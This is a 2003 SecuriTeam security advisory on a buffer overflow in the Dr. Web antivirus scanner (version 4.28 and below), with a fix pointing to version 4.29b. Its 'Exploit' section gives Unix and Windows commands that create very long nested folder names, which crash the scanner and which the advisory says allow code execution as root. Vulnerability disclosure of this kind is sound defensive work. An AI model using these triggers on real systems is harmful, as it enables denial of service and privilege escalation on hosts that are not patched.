[NT] Buffer Overflow Vulnerability in Dr. Web

From: support@securiteam.com
Date: 03/05/03

  • Next message: support@securiteam.com: "[NEWS] Critical Security Hole Found in Macromedia Flash Player"
    From: support@securiteam.com
    To: list@securiteam.com
    Date: 5 Mar 2003 21:33:34 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Buffer Overflow Vulnerability in Dr. Web
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.sald.com> Dr. WEB is an antivirus scanner.
    The new generation (DrWeb32) includes programs for Windows
    95/98/ME/2000/NT/XP, DOS/386, OS/2, Novell NetWare, Linux, FreeBSD 3.xx
    and 4.xx and Solaris x86.
    A vulnerability in Dr Web allows a user with access to the server to gain
    root privileges by overflowing a buffer in the program.

    DETAILS

    Vulnerable versions:
     * Dr Web Version 4.28 and below

    Immune versions:
     *Dr Web Version 4.29b and above

    When a user with access to the system creates files with a very long name
    it causes the buffer overflow and writes over the EIP, thus granting the
    user the ability to execute arbitrary code with root privileges.

    The program consists of a monitor and scanner. Only the scanner option was
    tested on the 4.28a version and it was found vulnerable.

    Exploit:
    Build a folder with a very long name:

    set a= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA
    set b= BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBB

    mkdir /$a
    mkdir /$a/$b

    Or:

    SET A = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA
    SET B = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBB

    mkdir \\?\c:\%A%
    mkdir \\?\c:\%B%

    Depending on system.

    When the Anti-virus tries to scan the folder it crashes.

    Solution:
    Download latest version from Dr Web: <http://www.sald.com/get.html>
    Newest Versions

    ADDITIONAL INFORMATION

    Information was provided by <mailto:conde0@telefonica.net> David
    Fernandez Madrid

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: support@securiteam.com: "[NEWS] Critical Security Hole Found in Macromedia Flash Player"

    Relevant Pages

    • Re: What is being a pen tester really like?
      ... Nessus is a vulnerability scanner and using it to ... conduct a test is called a vulnerability assessment. ... Security experts recommend that an annual penetration test be ... This is NOT something Nessus does, ...
      (Pen-Test)
    • [EXPL] Apache Multiple Space Header DoS (Multi-Threaded Exploit)
      ... The exploit code below is another version of the Apache 2.0.52 DoS ... vulnerability published previously here: ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NT] JBoot Password Bypassing Vulnerability
      ... housewarming rates on automated network vulnerability ... Place any Windows Startup Floppy ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] Suid Application Execution May Give Local Root (Exploit Code)
      ... It is possible for a local user under the FreeBSD operating system to ... For more information about the vulnerability please see: ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NT] Texis Sensitive Information Leak
      ... housewarming rates on automated network vulnerability ... The Texis program executes files written in Texis Web Script (a.k.a. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)